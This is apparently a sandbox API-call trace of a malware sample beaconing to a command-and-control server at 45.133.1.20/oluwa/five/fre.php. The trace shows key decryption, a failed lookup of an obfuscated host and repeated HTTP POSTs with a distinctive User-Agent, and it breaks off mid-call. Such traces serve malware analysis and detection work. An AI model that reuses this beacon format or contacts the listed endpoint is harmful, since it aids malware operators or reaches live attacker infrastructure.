[0195.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0195.983] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0195.984] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0195.984] GetProcessHeap () returned 0x6a0000 [0195.985] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0195.985] GetProcessHeap () returned 0x6a0000 [0195.985] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0195.985] send (s=0x4e4, buf=0x6b5c98*, len=242, flags=0) returned 242 [0195.986] send (s=0x4e4, buf=0x6bb998*, len=159, flags=0) returned 159 [0195.986] GetProcessHeap () returned 0x6a0000 [0195.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0195.986] recv (in: s=0x4e4, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0196.091] GetProcessHeap () returned 0x6a0000 [0196.091] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0196.092] GetProcessHeap () returned 0x6a0000 [0196.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0196.092] GetProcessHeap () returned 0x6a0000 [0196.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0196.092] GetProcessHeap () returned 0x6a0000 [0196.092] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0196.093] closesocket (s=0x4e4) returned 0 [0196.093] GetProcessHeap () returned 0x6a0000 [0196.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9f0 | out: hHeap=0x6a0000) returned 1 [0196.093] GetProcessHeap () returned 0x6a0000 [0196.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.094] GetProcessHeap () returned 0x6a0000 [0196.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0196.094] GetProcessHeap () returned 0x6a0000 [0196.094] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0196.095] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x5e8) returned 0x4e4 [0196.097] Sleep (dwMilliseconds=0xea60) [0196.098] GetProcessHeap () returned 0x6a0000 [0196.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0196.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.112] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.123] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0196.134] GetProcessHeap () returned 0x6a0000 [0196.134] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0196.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.136] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.139] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.140] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.140] GetProcessHeap () returned 0x6a0000 [0196.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0196.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.142] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0196.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.146] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.147] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0196.147] GetProcessHeap () returned 0x6a0000 [0196.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.148] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.148] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.149] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.149] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.151] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.152] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.152] GetProcessHeap () returned 0x6a0000 [0196.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0196.152] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.153] GetProcessHeap () returned 0x6a0000 [0196.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0196.153] GetProcessHeap () returned 0x6a0000 [0196.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.153] GetProcessHeap () returned 0x6a0000 [0196.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0196.157] GetProcessHeap () returned 0x6a0000 [0196.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0196.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0196.220] GetProcessHeap () returned 0x6a0000 [0196.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.221] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.223] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.225] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.225] GetProcessHeap () returned 0x6a0000 [0196.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.227] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0196.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.228] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.229] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.229] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0196.229] GetProcessHeap () returned 0x6a0000 [0196.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.230] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.231] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0196.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.232] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0196.233] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.234] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0196.235] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.235] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0196.235] GetProcessHeap () returned 0x6a0000 [0196.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0196.235] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0196.235] GetProcessHeap () returned 0x6a0000 [0196.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0196.238] socket (af=2, type=1, protocol=6) returned 0x4e8 [0196.238] connect (s=0x4e8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0196.261] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0196.261] GetProcessHeap () returned 0x6a0000 [0196.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0196.261] GetProcessHeap () returned 0x6a0000 [0196.261] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0196.262] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.263] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.263] GetProcessHeap () returned 0x6a0000 [0196.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0196.263] GetProcessHeap () returned 0x6a0000 [0196.264] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.264] GetProcessHeap () returned 0x6a0000 [0196.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0196.264] GetProcessHeap () returned 0x6a0000 [0196.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0196.265] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.266] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.266] GetProcessHeap () returned 0x6a0000 [0196.266] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0196.266] GetProcessHeap () returned 0x6a0000 [0196.267] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.267] send (s=0x4e8, buf=0x6b5c98*, len=242, flags=0) returned 242 [0196.268] send (s=0x4e8, buf=0x6bb998*, len=159, flags=0) returned 159 [0196.270] GetProcessHeap () returned 0x6a0000 [0196.270] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0196.270] recv (in: s=0x4e8, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0196.345] GetProcessHeap () returned 0x6a0000 [0196.346] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0196.346] GetProcessHeap () returned 0x6a0000 [0196.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0196.347] GetProcessHeap () returned 0x6a0000 [0196.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0196.347] GetProcessHeap () returned 0x6a0000 [0196.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0196.348] closesocket (s=0x4e8) returned 0 [0196.349] GetProcessHeap () returned 0x6a0000 [0196.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0196.349] GetProcessHeap () returned 0x6a0000 [0196.349] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.349] GetProcessHeap () returned 0x6a0000 [0196.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0196.350] GetProcessHeap () returned 0x6a0000 [0196.350] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0196.351] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xfe4) returned 0x4e8 [0196.354] Sleep (dwMilliseconds=0xea60) [0196.356] GetProcessHeap () returned 0x6a0000 [0196.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0196.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.359] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0196.471] GetProcessHeap () returned 0x6a0000 [0196.471] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.472] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.474] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.475] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.475] GetProcessHeap () returned 0x6a0000 [0196.476] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.480] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0196.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.481] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.482] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0196.482] GetProcessHeap () returned 0x6a0000 [0196.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.483] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.483] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0196.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.485] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0196.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.486] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0196.487] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.488] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0196.488] GetProcessHeap () returned 0x6a0000 [0196.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0196.488] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0196.488] GetProcessHeap () returned 0x6a0000 [0196.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0196.535] GetProcessHeap () returned 0x6a0000 [0196.535] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0196.536] GetProcessHeap () returned 0x6a0000 [0196.536] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0196.536] GetProcessHeap () returned 0x6a0000 [0196.536] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0196.537] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.537] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0196.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.547] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0196.555] GetProcessHeap () returned 0x6a0000 [0196.555] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0196.556] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.556] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0196.557] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.557] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0196.558] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.559] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0196.559] GetProcessHeap () returned 0x6a0000 [0196.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0196.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.560] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0196.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.562] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0196.564] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0196.564] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0196.564] GetProcessHeap () returned 0x6a0000 [0196.564] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0196.565] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.565] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0196.568] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.568] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0196.569] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.569] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0196.570] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0196.570] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0196.570] GetProcessHeap () returned 0x6a0000 [0196.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0196.570] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0196.570] GetProcessHeap () returned 0x6a0000 [0196.570] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0196.570] socket (af=2, type=1, protocol=6) returned 0x4ec [0196.571] connect (s=0x4ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0196.604] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0196.604] GetProcessHeap () returned 0x6a0000 [0196.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0196.604] GetProcessHeap () returned 0x6a0000 [0196.604] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0196.604] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.605] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0196.605] GetProcessHeap () returned 0x6a0000 [0196.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0196.606] GetProcessHeap () returned 0x6a0000 [0196.606] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0196.606] GetProcessHeap () returned 0x6a0000 [0196.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0196.606] GetProcessHeap () returned 0x6a0000 [0196.606] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0196.607] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0196.608] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0196.608] GetProcessHeap () returned 0x6a0000 [0196.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0196.608] GetProcessHeap () returned 0x6a0000 [0196.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 